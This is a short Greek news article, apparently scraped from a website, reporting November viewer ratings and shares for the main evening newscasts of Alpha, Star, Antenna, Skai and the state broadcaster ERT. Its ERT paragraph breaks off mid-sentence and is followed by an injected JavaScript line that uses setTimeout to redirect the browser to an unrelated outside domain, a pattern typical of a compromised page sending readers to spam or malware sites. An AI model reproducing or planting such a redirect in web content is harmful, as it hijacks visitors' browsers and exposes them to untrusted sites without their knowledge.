Οι ειδήσεις του Αlpha με τον Αντώνη Σρόιτερ στην κορυφή -Στη 2η θέση το Star

0
38
Με σημαντική διαφορά το κεντρικό δελτίο του Alpha, με τον Αντώνη Σρόιτερ, βρέθηκε στην κορυφή τον Νοέμβριο, ακολουθούμενο από το Star και τον Αντέννα.

Σε καθημερινή βάση τις ειδήσεις του Αlpha στις 7 το απόγευμα παρακολουθούσαν, κατά μέσο όρο, 751 χιλιάδες τηλεθεατές (ποσοστό 22,6%).

Image result for ζαχαρέα κάτια μακρη

Τις ειδήσεις του Star με τη Μάρα Ζαχαρέα στην παρουσίαση και την Κάτια Μακρή στον σχολιασμό, κάθε βράδι στις 8, παρακολουθούσαν 633 χιλιάδες τηλεθεατές (ποσοστό 17%).

Image result for χούκλη

Το κεντρικό δελτίο του Αντέννα με τη Μαρία Χούκλη, που μεταδίδεται απέναντι από εκείνο του Alpha στις 7 το απόγευμα, συγκέντρωσε 504 χιλιάδες τηλεθεατές κατά μέσο όρο (ποσοστό 15,1%).

Image result for σία κοσιώνη

Σε μικρή απόσταση ακολούθησαν οι ειδήσεις του Σκάι με τη Σία Κοσιώνη, στις 9 κάθε βράδι. Τις εμπιστεύθηκαν 482 χιλιάδες τηλεθεατές (11%).

Image result for αλαφογιώργος

>Πολύ χαμηλά κινήθηκε για έναν ακόμη μήνα το κεντρικό δελτίο της ΕΡΤ, το οποίο παρουσιάζει πλέον ο Αντώνης Αλαφογιώργος. Κέρδισε το ενδιαφέρον 174 χιλιάδων τηλεθεατών, κατά μέσο όρο, που αντιστοιχεί σε ποσοστό μόλις 4,2%. Στοιχείο που αποδεικνύει ότι δεν ευθυνόταν ο Πάνος Χαρίτος για τις χαμηλές τηλεθεάσεις του προηγούμενου έτους, αλλά το ίδιο το δημοσιογραφικό προιόν που προσφέρει η κρατική τηλεόραση,
setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here